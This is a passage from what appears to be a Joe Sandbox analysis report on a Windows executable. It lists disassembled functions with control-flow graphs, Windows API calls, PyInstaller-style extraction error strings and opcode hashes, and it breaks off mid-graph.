                                                                                                                                                                                                                                                    • Opcode ID: 13622b7b70a5489cd1e9d9666b20461ce2c076e8d4e1099f21d8c04fe7bf9fca
                                                                                                                                                                                                                                                    • Instruction ID: babff3fe1114e1f09b3c7e255ed922ae40d11d8b6f80e36fc38142ee0c99cdfb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13622b7b70a5489cd1e9d9666b20461ce2c076e8d4e1099f21d8c04fe7bf9fca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AD1C136E1824286EB30AF25D8405B963A1FFA4F94F5A4075DA0DC7A97DFBCE441C780
                                                                                                                                                                                                                                                    Function 00007FF69F405C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 514 7ff69f405c74-7ff69f405ce7 call 7ff69f4059a8 517 7ff69f405d01-7ff69f405d0b call 7ff69f3f7830 514->517 518 7ff69f405ce9-7ff69f405cf2 call 7ff69f3f43d4 514->518 523 7ff69f405d0d-7ff69f405d24 call 7ff69f3f43d4 call 7ff69f3f43f4 517->523 524 7ff69f405d26-7ff69f405d8f CreateFileW 517->524 525 7ff69f405cf5-7ff69f405cfc call 7ff69f3f43f4 518->525 523->525 527 7ff69f405d91-7ff69f405d97 524->527 528 7ff69f405e0c-7ff69f405e17 GetFileType 524->528 536 7ff69f406042-7ff69f406062 525->536 534 7ff69f405dd9-7ff69f405e07 GetLastError call 7ff69f3f4368 527->534 535 7ff69f405d99-7ff69f405d9d 527->535 531 7ff69f405e6a-7ff69f405e71 528->531 532 7ff69f405e19-7ff69f405e54 GetLastError call 7ff69f3f4368 CloseHandle 528->532 539 7ff69f405e73-7ff69f405e77 531->539 540 7ff69f405e79-7ff69f405e7c 531->540 532->525 548 7ff69f405e5a-7ff69f405e65 call 7ff69f3f43f4 532->548 534->525 535->534 541 7ff69f405d9f-7ff69f405dd7 CreateFileW 535->541 545 7ff69f405e82-7ff69f405ed7 call 7ff69f3f7748 539->545 540->545 546 7ff69f405e7e 540->546 541->528 541->534 553 7ff69f405ed9-7ff69f405ee5 call 7ff69f405bb0 545->553 554 7ff69f405ef6-7ff69f405f27 call 7ff69f405728 545->554 546->545 548->525 553->554 559 7ff69f405ee7 553->559 560 7ff69f405f2d-7ff69f405f6f 554->560 561 7ff69f405f29-7ff69f405f2b 554->561 562 7ff69f405ee9-7ff69f405ef1 call 7ff69f3f9dd0 559->562 563 7ff69f405f91-7ff69f405f9c 560->563 564 7ff69f405f71-7ff69f405f75 560->564 561->562 562->536 567 7ff69f405fa2-7ff69f405fa6 563->567 568 7ff69f406040 563->568 564->563 566 7ff69f405f77-7ff69f405f8c 564->566 566->563 567->568 570 7ff69f405fac-7ff69f405ff1 CloseHandle CreateFileW 567->570 568->536 571 7ff69f405ff3-7ff69f406021 GetLastError call 7ff69f3f4368 call 7ff69f3f7970 570->571 572 7ff69f406026-7ff69f40603b 570->572 571->572 572->568
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                                                    • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                                                    • Instruction ID: 95c79492d3348c79c3d25435a03a81efeedb92ebdc8a46b934ee95b5c653d349
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58C1D332B28A4286EB60CF69C4806AC3761FB59B98B161275DF2EDB796CF7CD451C340
                                                                                                                                                                                                                                                    Function 00007FF69F40518C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 845 7ff69f40518c-7ff69f4051c1 call 7ff69f404898 call 7ff69f4048a0 call 7ff69f404908 852 7ff69f4052ff-7ff69f40536d call 7ff69f3f9c10 call 7ff69f400888 845->852 853 7ff69f4051c7-7ff69f4051d2 call 7ff69f4048a8 845->853 865 7ff69f40536f-7ff69f405376 852->865 866 7ff69f40537b-7ff69f40537e 852->866 853->852 858 7ff69f4051d8-7ff69f4051e3 call 7ff69f4048d8 853->858 858->852 864 7ff69f4051e9-7ff69f40520c call 7ff69f3f9c58 GetTimeZoneInformation 858->864 876 7ff69f4052d4-7ff69f4052fe call 7ff69f404890 call 7ff69f404880 call 7ff69f404888 864->876 877 7ff69f405212-7ff69f405233 864->877 870 7ff69f40540b-7ff69f40540e 865->870 868 7ff69f4053b5-7ff69f4053c8 call 7ff69f3fc90c 866->868 869 7ff69f405380 866->869 881 7ff69f4053d3-7ff69f4053ee call 7ff69f400888 868->881 882 7ff69f4053ca 868->882 872 7ff69f405383 869->872 870->872 874 7ff69f405414-7ff69f40541c call 7ff69f404f10 870->874 878 7ff69f405388-7ff69f4053b4 call 7ff69f3f9c58 call 7ff69f3eb870 872->878 879 7ff69f405383 call 7ff69f40518c 872->879 874->878 884 7ff69f405235-7ff69f40523b 877->884 885 7ff69f40523e-7ff69f405245 877->885 879->878 901 7ff69f4053f5-7ff69f405407 call 7ff69f3f9c58 881->901 902 7ff69f4053f0-7ff69f4053f3 881->902 888 7ff69f4053cc-7ff69f4053d1 call 7ff69f3f9c58 882->888 884->885 890 7ff69f405259 885->890 891 7ff69f405247-7ff69f40524f 885->891 888->869 898 7ff69f40525b-7ff69f4052cf call 7ff69f4097e0 * 4 call 7ff69f401e6c call 7ff69f405424 * 2 890->898 891->890 896 7ff69f405251-7ff69f405257 891->896 896->898 898->876 901->870 902->888
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051BA
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F404908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F40491C
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051CB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F4048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F4048BC
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69F4051DC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F4048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F4048EC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F9C58: GetLastError.KERNEL32(?,?,?,00007FF69F402032,?,?,?,00007FF69F40206F,?,?,00000000,00007FF69F402535,?,?,?,00007FF69F402467), ref: 00007FF69F3F9C78
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69F40541C), ref: 00007FF69F405203
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                    • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                    • Opcode ID: a6c212af5f4fde8bec092a8ad4ab86d219424c673f68ca1923c57f3e2ab8ca08
                                                                                                                                                                                                                                                    • Instruction ID: d8726be4f7253cf78b532d76981d9f2d796e23afa3329dc72bb78157f9603ff9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6c212af5f4fde8bec092a8ad4ab86d219424c673f68ca1923c57f3e2ab8ca08
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C251A036A1864286E730EF21E8805B97360FF68B84F4A4179EA4DC7697DF7CE441CB80
                                                                                                                                                                                                                                                    Function 00007FF69F3E85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                                                    • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                                    • Instruction ID: e67e538c3446e0a0c4f8dc36df9c396856ac94097e14d1ae94005d489783d2e0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6F0C222A1868287F7B08B60B48837673A0EF84768F050339DA6D866D4CF7CE4688B04
                                                                                                                                                                                                                                                    Function 00007FF69F3E18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 179 7ff69f3e18f0-7ff69f3e192b call 7ff69f3e3f70 182 7ff69f3e1bc1-7ff69f3e1be5 call 7ff69f3eb870 179->182 183 7ff69f3e1931-7ff69f3e1971 call 7ff69f3e76a0 179->183 188 7ff69f3e1bae-7ff69f3e1bb1 call 7ff69f3ef36c 183->188 189 7ff69f3e1977-7ff69f3e1987 call 7ff69f3ef9f4 183->189 192 7ff69f3e1bb6-7ff69f3e1bbe 188->192 194 7ff69f3e19a1-7ff69f3e19bd call 7ff69f3ef6bc 189->194 195 7ff69f3e1989-7ff69f3e199c call 7ff69f3e2760 189->195 192->182 200 7ff69f3e19bf-7ff69f3e19d2 call 7ff69f3e2760 194->200 201 7ff69f3e19d7-7ff69f3e19ec call 7ff69f3f4154 194->201 195->188 200->188 206 7ff69f3e19ee-7ff69f3e1a01 call 7ff69f3e2760 201->206 207 7ff69f3e1a06-7ff69f3e1a87 call 7ff69f3e1bf0 * 2 call 7ff69f3ef9f4 201->207 206->188 215 7ff69f3e1a8c-7ff69f3e1a9f call 7ff69f3f4170 207->215 218 7ff69f3e1aa1-7ff69f3e1ab4 call 7ff69f3e2760 215->218 219 7ff69f3e1ab9-7ff69f3e1ad2 call 7ff69f3ef6bc 215->219 218->188 224 7ff69f3e1ad4-7ff69f3e1ae7 call 7ff69f3e2760 219->224 225 7ff69f3e1aec-7ff69f3e1b08 call 7ff69f3ef430 219->225 224->188 230 7ff69f3e1b1b-7ff69f3e1b29 225->230 231 7ff69f3e1b0a-7ff69f3e1b16 call 7ff69f3e25f0 225->231 230->188 233 7ff69f3e1b2f-7ff69f3e1b3e 230->233 231->188 235 7ff69f3e1b40-7ff69f3e1b46 233->235 236 7ff69f3e1b60-7ff69f3e1b6f 235->236 237 7ff69f3e1b48-7ff69f3e1b55 235->237 236->236 238 7ff69f3e1b71-7ff69f3e1b7a 236->238 237->238 239 7ff69f3e1b8f 238->239 240 7ff69f3e1b7c-7ff69f3e1b7f 238->240 242 7ff69f3e1b91-7ff69f3e1bac 239->242 240->239 241 7ff69f3e1b81-7ff69f3e1b84 240->241 241->239 243 7ff69f3e1b86-7ff69f3e1b89 241->243 242->188 242->235 243->239 244 7ff69f3e1b8b-7ff69f3e1b8d 243->244 244->242
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                    • API String ID: 677216364-3497178890
                                                                                                                                                                                                                                                    • Opcode ID: 7fb1565e62af08d3dd437cd56da20392538a2aaef22cf3b3cc5fc9a8e547cbde
                                                                                                                                                                                                                                                    • Instruction ID: 4cb4f75253b6175fbfa9db465d4b5f2684cbbf00d6dba56c66a1576b5a6a6ef8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fb1565e62af08d3dd437cd56da20392538a2aaef22cf3b3cc5fc9a8e547cbde
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9719131B1868786EB70DB25D4506F93390EF48B84F465079E98DCB79AEF6CE9448B80
                                                                                                                                                                                                                                                    Function 00007FF69F3E1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                    • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                    • Opcode ID: 597b59f18e581e5056d70d4f11ead5da027c579e9843cd10df17923ccc1721f9
                                                                                                                                                                                                                                                    • Instruction ID: f69ba91c2c990b86384f7b5fb06afc35f8a582d5b0edda756104ac924e8cccbd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 597b59f18e581e5056d70d4f11ead5da027c579e9843cd10df17923ccc1721f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5419822B0864383FB30AB16E4405BA63A0FF54BD4F564075DE4DCBBA6EE7CE9458744
                                                                                                                                                                                                                                                    Function 00007FF69F3E11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 577 7ff69f3e11f0-7ff69f3e124d call 7ff69f3eb0a0 580 7ff69f3e124f-7ff69f3e1276 call 7ff69f3e25f0 577->580 581 7ff69f3e1277-7ff69f3e128f call 7ff69f3f4170 577->581 586 7ff69f3e1291-7ff69f3e12a8 call 7ff69f3e2760 581->586 587 7ff69f3e12ad-7ff69f3e12bd call 7ff69f3f4170 581->587 592 7ff69f3e1409-7ff69f3e141e call 7ff69f3ead80 call 7ff69f3f415c * 2 586->592 593 7ff69f3e12bf-7ff69f3e12d6 call 7ff69f3e2760 587->593 594 7ff69f3e12db-7ff69f3e12ed 587->594 609 7ff69f3e1423-7ff69f3e143d 592->609 593->592 596 7ff69f3e12f0-7ff69f3e1315 call 7ff69f3ef6bc 594->596 603 7ff69f3e1401 596->603 604 7ff69f3e131b-7ff69f3e1325 call 7ff69f3ef430 596->604 603->592 604->603 610 7ff69f3e132b-7ff69f3e1337 604->610 611 7ff69f3e1340-7ff69f3e1368 call 7ff69f3e94e0 610->611 614 7ff69f3e136a-7ff69f3e136d 611->614 615 7ff69f3e13e6-7ff69f3e13fc call 7ff69f3e25f0 611->615 616 7ff69f3e136f-7ff69f3e1379 614->616 617 7ff69f3e13e1 614->617 615->603 619 7ff69f3e13a4-7ff69f3e13a7 616->619 620 7ff69f3e137b-7ff69f3e1389 call 7ff69f3efdfc 616->620 617->615 622 7ff69f3e13ba-7ff69f3e13bf 619->622 623 7ff69f3e13a9-7ff69f3e13b7 call 7ff69f409140 619->623 624 7ff69f3e138e-7ff69f3e1391 620->624 622->611 626 7ff69f3e13c5-7ff69f3e13c8 622->626 623->622 629 7ff69f3e1393-7ff69f3e139d call 7ff69f3ef430 624->629 630 7ff69f3e139f-7ff69f3e13a2 624->630 627 7ff69f3e13ca-7ff69f3e13cd 626->627 628 7ff69f3e13dc-7ff69f3e13df 626->628 627->615 632 7ff69f3e13cf-7ff69f3e13d7 627->632 628->603 629->622 629->630 630->615 632->596
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                    • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                                                    • Opcode ID: 3382650171413043e85556ed5a2ba183a8053ec2bc037e3f15fd05f8cf2359a5
                                                                                                                                                                                                                                                    • Instruction ID: c343d0515cb4132e860e4b60066fa7909bdf6ab175e64f7a196673660b205d9e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3382650171413043e85556ed5a2ba183a8053ec2bc037e3f15fd05f8cf2359a5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F511922A0864282EB70AB16E8403BA6351FF94794F590179ED4DCB7D6EF3CED05C780
                                                                                                                                                                                                                                                    Function 00007FF69F3FE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF69F3FE3BA,?,?,-00000018,00007FF69F3FA063,?,?,?,00007FF69F3F9F5A,?,?,?,00007FF69F3F524E), ref: 00007FF69F3FE19C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF69F3FE3BA,?,?,-00000018,00007FF69F3FA063,?,?,?,00007FF69F3F9F5A,?,?,?,00007FF69F3F524E), ref: 00007FF69F3FE1A8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                    • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                                    • Instruction ID: c0a2210a270e3655998636897df1d307ffa1d24db630c47db9f2a3ef920fc662
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3941E031B19A0282FA76CB17E9006752392FF49BA0F0A4579DD0DCB785EE3CE9859384
                                                                                                                                                                                                                                                    Function 00007FF69F3FAD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 732 7ff69f3fad6c-7ff69f3fad92 733 7ff69f3fad94-7ff69f3fada8 call 7ff69f3f43d4 call 7ff69f3f43f4 732->733 734 7ff69f3fadad-7ff69f3fadb1 732->734 750 7ff69f3fb19e 733->750 736 7ff69f3fb187-7ff69f3fb193 call 7ff69f3f43d4 call 7ff69f3f43f4 734->736 737 7ff69f3fadb7-7ff69f3fadbe 734->737 756 7ff69f3fb199 call 7ff69f3f9bf0 736->756 737->736 739 7ff69f3fadc4-7ff69f3fadf2 737->739 739->736 742 7ff69f3fadf8-7ff69f3fadff 739->742 745 7ff69f3fae01-7ff69f3fae13 call 7ff69f3f43d4 call 7ff69f3f43f4 742->745 746 7ff69f3fae18-7ff69f3fae1b 742->746 745->756 748 7ff69f3fb183-7ff69f3fb185 746->748 749 7ff69f3fae21-7ff69f3fae27 746->749 753 7ff69f3fb1a1-7ff69f3fb1b8 748->753 749->748 754 7ff69f3fae2d-7ff69f3fae30 749->754 750->753 754->745 758 7ff69f3fae32-7ff69f3fae57 754->758 756->750 761 7ff69f3fae8a-7ff69f3fae91 758->761 762 7ff69f3fae59-7ff69f3fae5b 758->762 763 7ff69f3fae93-7ff69f3faebb call 7ff69f3fc90c call 7ff69f3f9c58 * 2 761->763 764 7ff69f3fae66-7ff69f3fae7d call 7ff69f3f43d4 call 7ff69f3f43f4 call 7ff69f3f9bf0 761->764 765 7ff69f3fae82-7ff69f3fae88 762->765 766 7ff69f3fae5d-7ff69f3fae64 762->766 793 7ff69f3faebd-7ff69f3faed3 call 7ff69f3f43f4 call 7ff69f3f43d4 763->793 794 7ff69f3faed8-7ff69f3faf03 call 7ff69f3fb594 763->794 798 7ff69f3fb010 764->798 769 7ff69f3faf08-7ff69f3faf1f 765->769 766->764 766->765 770 7ff69f3faf21-7ff69f3faf29 769->770 771 7ff69f3faf9a-7ff69f3fafa4 call 7ff69f402c2c 769->771 770->771 774 7ff69f3faf2b-7ff69f3faf2d 770->774 784 7ff69f3fb02e 771->784 785 7ff69f3fafaa-7ff69f3fafbf 771->785 774->771 778 7ff69f3faf2f-7ff69f3faf45 774->778 778->771 782 7ff69f3faf47-7ff69f3faf53 778->782 782->771 787 7ff69f3faf55-7ff69f3faf57 782->787 789 7ff69f3fb033-7ff69f3fb053 ReadFile 784->789 785->784 790 7ff69f3fafc1-7ff69f3fafd3 